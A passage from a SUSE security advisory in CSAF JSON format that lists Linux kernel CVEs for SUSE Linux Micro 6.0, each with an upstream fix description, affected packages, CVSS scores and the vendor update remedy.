"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54136"
},
{
"cve": "CVE-2023-54137",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54137"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/type1: fix cap_migration information leak\n\nFix an information leak where an uninitialized hole in struct\nvfio_iommu_type1_info_cap_migration on the stack is exposed to userspace.\n\nThe definition of struct vfio_iommu_type1_info_cap_migration contains a hole as\nshown in this pahole(1) output:\n\n struct vfio_iommu_type1_info_cap_migration {\n struct vfio_info_cap_header header; /* 0 8 */\n __u32 flags; /* 8 4 */\n\n /* XXX 4 bytes hole, try to pack */\n\n __u64 pgsize_bitmap; /* 16 8 */\n __u64 max_dirty_bitmap_size; /* 24 8 */\n\n /* size: 32, cachelines: 1, members: 4 */\n /* sum members: 28, holes: 1, sum holes: 4 */\n /* last cacheline: 32 bytes */\n };\n\nThe cap_mig variable is filled in without initializing the hole:\n\n static int vfio_iommu_migration_build_caps(struct vfio_iommu *iommu,\n struct vfio_info_cap *caps)\n {\n struct vfio_iommu_type1_info_cap_migration cap_mig;\n\n cap_mig.header.id = VFIO_IOMMU_TYPE1_INFO_CAP_MIGRATION;\n cap_mig.header.version = 1;\n\n cap_mig.flags = 0;\n /* support minimum pgsize */\n cap_mig.pgsize_bitmap = (size_t)1 \u003c\u003c __ffs(iommu-\u003epgsize_bitmap);\n cap_mig.max_dirty_bitmap_size = DIRTY_BITMAP_SIZE_MAX;\n\n return vfio_info_add_capability(caps, \u0026cap_mig.header, sizeof(cap_mig));\n }\n\nThe structure is then copied to a temporary location on the heap. At this point\nit\u0027s already too late and ioctl(VFIO_IOMMU_GET_INFO) copies it to userspace\nlater:\n\n int vfio_info_add_capability(struct vfio_info_cap *caps,\n struct vfio_info_cap_header *cap, size_t size)\n {\n struct vfio_info_cap_header *header;\n\n header = vfio_info_cap_add(caps, size, cap-\u003eid, cap-\u003eversion);\n if (IS_ERR(header))\n return PTR_ERR(header);\n\n memcpy(header + 1, cap + 1, size - sizeof(*header));\n\n return 0;\n }\n\nThis issue was found by code inspection.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54137",
"url": "https://www.suse.com/security/cve/CVE-2023-54137"
},
{
"category": "external",
"summary": "SUSE Bug 1256100 for CVE-2023-54137",
"url": "https://bugzilla.suse.com/1256100"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54137"
},
{
"cve": "CVE-2023-54140",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54140"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix WARNING in mark_buffer_dirty due to discarded buffer reuse\n\nA syzbot stress test using a corrupted disk image reported that\nmark_buffer_dirty() called from __nilfs_mark_inode_dirty() or\nnilfs_palloc_commit_alloc_entry() may output a kernel warning, and can\npanic if the kernel is booted with panic_on_warn.\n\nThis is because nilfs2 keeps buffer pointers in local structures for some\nmetadata and reuses them, but such buffers may be forcibly discarded by\nnilfs_clear_dirty_page() in some critical situations.\n\nThis issue is reported to appear after commit 28a65b49eb53 (\"nilfs2: do\nnot write dirty data after degenerating to read-only\"), but the issue has\npotentially existed before.\n\nFix this issue by checking the uptodate flag when attempting to reuse an\ninternally held buffer, and reloading the metadata instead of reusing the\nbuffer if the flag was lost.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54140",
"url": "https://www.suse.com/security/cve/CVE-2023-54140"
},
{
"category": "external",
"summary": "SUSE Bug 1256093 for CVE-2023-54140",
"url": "https://bugzilla.suse.com/1256093"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2023-54140"
},
{
"cve": "CVE-2023-54141",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54141"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath11k: Add missing hw_ops-\u003eget_ring_selector() for IPQ5018\n\nDuring sending data after clients connected, hw_ops-\u003eget_ring_selector()\nwill be called. But for IPQ5018, this member isn\u0027t set, and the\nfollowing NULL pointer exception will be occurred:\n\n\t[ 38.840478] 8\u003c--- cut here ---\n\t[ 38.840517] Unable to handle kernel NULL pointer dereference at virtual address 00000000\n\t...\n\t[ 38.923161] PC is at 0x0\n\t[ 38.927930] LR is at ath11k_dp_tx+0x70/0x730 [ath11k]\n\t...\n\t[ 39.063264] Process hostapd (pid: 1034, stack limit = 0x801ceb3d)\n\t[ 39.068994] Stack: (0x856a9a68 to 0x856aa000)\n\t...\n\t[ 39.438467] [\u003c7f323804\u003e] (ath11k_dp_tx [ath11k]) from [\u003c7f314e6c\u003e] (ath11k_mac_op_tx+0x80/0x190 [ath11k])\n\t[ 39.446607] [\u003c7f314e6c\u003e] (ath11k_mac_op_tx [ath11k]) from [\u003c7f17dbe0\u003e] (ieee80211_handle_wake_tx_queue+0x7c/0xc0 [mac80211])\n\t[ 39.456162] [\u003c7f17dbe0\u003e] (ieee80211_handle_wake_tx_queue [mac80211]) from [\u003c7f174450\u003e] (ieee80211_probereq_get+0x584/0x704 [mac80211])\n\t[ 39.467443] [\u003c7f174450\u003e] (ieee80211_probereq_get [mac80211]) from [\u003c7f178c40\u003e] (ieee80211_tx_prepare_skb+0x1f8/0x248 [mac80211])\n\t[ 39.479334] [\u003c7f178c40\u003e] (ieee80211_tx_prepare_skb [mac80211]) from [\u003c7f179e28\u003e] (__ieee80211_subif_start_xmit+0x32c/0x3d4 [mac80211])\n\t[ 39.491053] [\u003c7f179e28\u003e] (__ieee80211_subif_start_xmit [mac80211]) from [\u003c7f17af08\u003e] (ieee80211_tx_control_port+0x19c/0x288 [mac80211])\n\t[ 39.502946] [\u003c7f17af08\u003e] (ieee80211_tx_control_port [mac80211]) from [\u003c7f0fc704\u003e] (nl80211_tx_control_port+0x174/0x1d4 [cfg80211])\n\t[ 39.515017] [\u003c7f0fc704\u003e] (nl80211_tx_control_port [cfg80211]) from [\u003c808ceac4\u003e] (genl_rcv_msg+0x154/0x340)\n\t[ 39.526814] [\u003c808ceac4\u003e] (genl_rcv_msg) from [\u003c808cdb74\u003e] (netlink_rcv_skb+0xb8/0x11c)\n\t[ 39.536446] [\u003c808cdb74\u003e] (netlink_rcv_skb) from [\u003c808ce1d0\u003e] (genl_rcv+0x28/0x34)\n\t[ 39.544344] [\u003c808ce1d0\u003e] (genl_rcv) from [\u003c808cd234\u003e] (netlink_unicast+0x174/0x274)\n\t[ 39.551895] [\u003c808cd234\u003e] (netlink_unicast) from [\u003c808cd510\u003e] (netlink_sendmsg+0x1dc/0x440)\n\t[ 39.559362] [\u003c808cd510\u003e] (netlink_sendmsg) from [\u003c808596e0\u003e] (____sys_sendmsg+0x1a8/0x1fc)\n\t[ 39.567697] [\u003c808596e0\u003e] (____sys_sendmsg) from [\u003c8085b1a8\u003e] (___sys_sendmsg+0xa4/0xdc)\n\t[ 39.575941] [\u003c8085b1a8\u003e] (___sys_sendmsg) from [\u003c8085b310\u003e] (sys_sendmsg+0x44/0x74)\n\t[ 39.583841] [\u003c8085b310\u003e] (sys_sendmsg) from [\u003c80300060\u003e] (ret_fast_syscall+0x0/0x40)\n\t...\n\t[ 39.620734] Code: bad PC value\n\t[ 39.625869] ---[ end trace 8aef983ad3cbc032 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54141",
"url": "https://www.suse.com/security/cve/CVE-2023-54141"
},
{
"category": "external",
"summary": "SUSE Bug 1256094 for CVE-2023-54141",
"url": "https://bugzilla.suse.com/1256094"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54141"
},
{
"cve": "CVE-2023-54142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54142"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngtp: Fix use-after-free in __gtp_encap_destroy().\n\nsyzkaller reported use-after-free in __gtp_encap_destroy(). [0]\n\nIt shows the same process freed sk and touched it illegally.\n\nCommit e198987e7dd7 (\"gtp: fix suspicious RCU usage\") added lock_sock()\nand release_sock() in __gtp_encap_destroy() to protect sk-\u003esk_user_data,\nbut release_sock() is called after sock_put() releases the last refcnt.\n\n[0]:\nBUG: KASAN: slab-use-after-free in instrument_atomic_read_write include/linux/instrumented.h:96 [inline]\nBUG: KASAN: slab-use-after-free in atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline]\nBUG: KASAN: slab-use-after-free in queued_spin_lock include/asm-generic/qspinlock.h:111 [inline]\nBUG: KASAN: slab-use-after-free in do_raw_spin_lock include/linux/spinlock.h:186 [inline]\nBUG: KASAN: slab-use-after-free in __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline]\nBUG: KASAN: slab-use-after-free in _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178\nWrite of size 4 at addr ffff88800dbef398 by task syz-executor.2/2401\n\nCPU: 1 PID: 2401 Comm: syz-executor.2 Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #2\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x72/0xa0 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:351 [inline]\n print_report+0xcc/0x620 mm/kasan/report.c:462\n kasan_report+0xb2/0xe0 mm/kasan/report.c:572\n check_region_inline mm/kasan/generic.c:181 [inline]\n kasan_check_range+0x39/0x1c0 mm/kasan/generic.c:187\n instrument_atomic_read_write include/linux/instrumented.h:96 [inline]\n atomic_try_cmpxchg_acquire include/linux/atomic/atomic-instrumented.h:541 [inline]\n queued_spin_lock include/asm-generic/qspinlock.h:111 [inline]\n do_raw_spin_lock include/linux/spinlock.h:186 [inline]\n __raw_spin_lock_bh include/linux/spinlock_api_smp.h:127 [inline]\n _raw_spin_lock_bh+0x75/0xe0 kernel/locking/spinlock.c:178\n spin_lock_bh include/linux/spinlock.h:355 [inline]\n release_sock+0x1f/0x1a0 net/core/sock.c:3526\n gtp_encap_disable_sock drivers/net/gtp.c:651 [inline]\n gtp_encap_disable+0xb9/0x220 drivers/net/gtp.c:664\n gtp_dev_uninit+0x19/0x50 drivers/net/gtp.c:728\n unregister_netdevice_many_notify+0x97e/0x1520 net/core/dev.c:10841\n rtnl_delete_link net/core/rtnetlink.c:3216 [inline]\n rtnl_dellink+0x3c0/0xb30 net/core/rtnetlink.c:3268\n rtnetlink_rcv_msg+0x450/0xb10 net/core/rtnetlink.c:6423\n netlink_rcv_skb+0x15d/0x450 net/netlink/af_netlink.c:2548\n netlink_unicast_kernel net/netlink/af_netlink.c:1339 [inline]\n netlink_unicast+0x700/0x930 net/netlink/af_netlink.c:1365\n netlink_sendmsg+0x91c/0xe30 net/netlink/af_netlink.c:1913\n sock_sendmsg_nosec net/socket.c:724 [inline]\n sock_sendmsg+0x1b7/0x200 net/socket.c:747\n ____sys_sendmsg+0x75a/0x990 net/socket.c:2493\n ___sys_sendmsg+0x11d/0x1c0 net/socket.c:2547\n __sys_sendmsg+0xfe/0x1d0 net/socket.c:2576\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3f/0x90 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\nRIP: 0033:0x7f1168b1fe5d\nCode: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d 73 9f 1b 00 f7 d8 64 89 01 48\nRSP: 002b:00007f1167edccc8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e\nRAX: ffffffffffffffda RBX: 00000000004bbf80 RCX: 00007f1168b1fe5d\nRDX: 0000000000000000 RSI: 00000000200002c0 RDI: 0000000000000003\nRBP: 00000000004bbf80 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 000000000000000b R14: 00007f1168b80530 R15: 0000000000000000\n \u003c/TASK\u003e\n\nAllocated by task 1483:\n kasan_save_stack+0x22/0x50 mm/kasan/common.c:45\n kasan_set_track+0x25/0x30 mm/kasan/common.c:52\n __kasan_slab_alloc+0x\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54142",
"url": "https://www.suse.com/security/cve/CVE-2023-54142"
},
{
"category": "external",
"summary": "SUSE Bug 1256095 for CVE-2023-54142",
"url": "https://bugzilla.suse.com/1256095"
},
{
"category": "external",
"summary": "SUSE Bug 1256097 for CVE-2023-54142",
"url": "https://bugzilla.suse.com/1256097"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2023-54142"
},
{
"cve": "CVE-2023-54143",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54143"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: mediatek: vcodec: fix resource leaks in vdec_msg_queue_init()\n\nIf we encounter any error in the vdec_msg_queue_init() then we need\nto set \"msg_queue-\u003ewdma_addr.size = 0;\". Normally, this is done\ninside the vdec_msg_queue_deinit() function. However, if the\nfirst call to allocate \u0026msg_queue-\u003ewdma_addr fails, then the\nvdec_msg_queue_deinit() function is a no-op. For that situation, just\nset the size to zero explicitly and return.\n\nThere were two other error paths which did not clean up before returning.\nChange those error paths to goto mem_alloc_err.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54143",
"url": "https://www.suse.com/security/cve/CVE-2023-54143"
},
{
"category": "external",
"summary": "SUSE Bug 1256096 for CVE-2023-54143",
"url": "https://bugzilla.suse.com/1256096"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
